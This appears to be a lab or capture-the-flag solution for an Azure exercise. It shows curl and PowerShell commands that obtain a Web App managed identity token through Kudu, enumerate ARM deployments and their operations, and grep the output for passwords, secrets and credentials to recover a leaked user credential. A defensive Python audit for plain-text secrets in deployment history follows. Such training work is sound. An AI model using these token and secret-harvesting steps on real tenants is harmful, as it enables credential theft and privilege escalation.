Answer : A
The answer is the exposed provisioning secret retrieved from ARM deployment metadata, deployment operations, or App Service configuration. In this lab chain, it should reveal the next user credential, commonly for:
sumit.siddharth@azuresecops.onmicrosoft.com
Detailed Solution:
The key point is this: you are no longer only using Alex's user permissions. You must use the Web App managed identity.
From the Web App runtime/Kudu console, request an access token for Azure Resource Manager.
For Linux-style shell:
# Double quotes are required so the shell expands the App Service variables.
curl "${IDENTITY_ENDPOINT}?api-version=2019-08-01&resource=https://management.azure.com/&client_id=cf3664d4-5cec-4feb-b0ef-88b7958809df" \
  -H "X-IDENTITY-HEADER: ${IDENTITY_HEADER}"
For Windows PowerShell inside Kudu:
# Double quotes and $() so PowerShell expands the variable and does not read '?' as part of its name.
$uri = "$($env:IDENTITY_ENDPOINT)?api-version=2019-08-01&resource=https://management.azure.com/&client_id=cf3664d4-5cec-4feb-b0ef-88b7958809df"
$response = Invoke-RestMethod -Uri $uri -Headers @{
    'X-IDENTITY-HEADER' = $env:IDENTITY_HEADER
}
$token = $response.access_token
Now use the token to query Azure Resource Manager.
$sub = '7403ec86-c39d-4d80-9efa-35c7580ecefa'
$rg = 'Excalibur-Resources'
Invoke-RestMethod `
    -Uri "https://management.azure.com/subscriptions/$sub/resourceGroups/$rg/resources?api-version=2021-04-01" `
    -Headers @{ Authorization = "Bearer $token" }
Next, enumerate ARM deployments.
Invoke-RestMethod `
    -Uri "https://management.azure.com/subscriptions/$sub/resourceGroups/$rg/providers/Microsoft.Resources/deployments?api-version=2021-04-01" `
    -Headers @{ Authorization = "Bearer $token" }
For each deployment name returned, inspect it:
$deploymentName = '<deployment-name>'
Invoke-RestMethod `
    -Uri "https://management.azure.com/subscriptions/$sub/resourceGroups/$rg/providers/Microsoft.Resources/deployments/$($deploymentName)?api-version=2021-04-01" `
    -Headers @{ Authorization = "Bearer $token" }
Also check deployment operations:
Invoke-RestMethod `
    -Uri "https://management.azure.com/subscriptions/$sub/resourceGroups/$rg/providers/Microsoft.Resources/deployments/$deploymentName/operations?api-version=2021-04-01" `
    -Headers @{ Authorization = "Bearer $token" }
Search the output for fields like:
password
secret
adminPassword
userPassword
credential
sumit
The exposed value is the answer to Q4.
A practical one-liner on Linux would be:
curl -s -H "Authorization: Bearer $TOKEN" \
  'https://management.azure.com/subscriptions/7403ec86-c39d-4d80-9efa-35c7580ecefa/resourceGroups/Excalibur-Resources/providers/Microsoft.Resources/deployments/<deployment-name>/operations?api-version=2021-04-01' \
  | jq '.. | strings' | grep -iE 'password|secret|credential|sumit|flag'
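The secret is readable here because the template passed it as a plain String; ARM does not store the value of a SecureString or SecureObject parameter in deployment history. The following audit is an added example, not part of the lab solution: it takes a deployment record as returned by the deployments GET call and reports secret-looking parameters and outputs that were stored with a readable value. The function name, the name pattern and the sample record are assumptions constructed for illustration.

```python
import json
import re

# Assumed naming pattern for entries that usually carry credentials.
SECRET_NAME = re.compile(
    r"password|passwd|secret|credential|token|connectionstring|apikey", re.I
)
SECURE_TYPES = {"securestring", "secureobject"}


def audit_deployment(deployment):
    """Return (deployment, section, name, declared type) for each risky entry.

    An entry is risky when its name looks like a secret, its declared type is
    not a secure type, and a value was actually stored. The value itself is
    never returned, so the report can be shared without leaking it again.
    """
    props = deployment.get("properties") or {}
    findings = []
    for section in ("parameters", "outputs"):
        for name, entry in (props.get(section) or {}).items():
            if not isinstance(entry, dict):
                continue
            declared = str(entry.get("type", ""))
            if (SECRET_NAME.search(name)
                    and declared.lower() not in SECURE_TYPES
                    and "value" in entry):
                findings.append((deployment.get("name"), section, name, declared))
    return findings


# Constructed sample shaped like a deployments GET response (not lab data).
SAMPLE = json.loads("""
{"name": "provision-webapp",
 "properties": {
   "parameters": {
     "userPassword":  {"type": "String", "value": "constructed-not-real"},
     "adminPassword": {"type": "SecureString"},
     "location":      {"type": "String", "value": "westeurope"}},
   "outputs": {
     "dbSecret": {"type": "String", "value": "constructed-not-real"}}}}
""")

if __name__ == "__main__":
    for finding in audit_deployment(SAMPLE):
        print("plain-text secret in deployment history:", finding)
```

Each finding points at a template parameter or output to redeclare as a secure type; a credential that was already stored this way should also be rotated and the old deployment record deleted.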
Final Answer:
Use the leaked secret/password value returned from the deployment metadata. Do not guess this; it is lab-generated.
================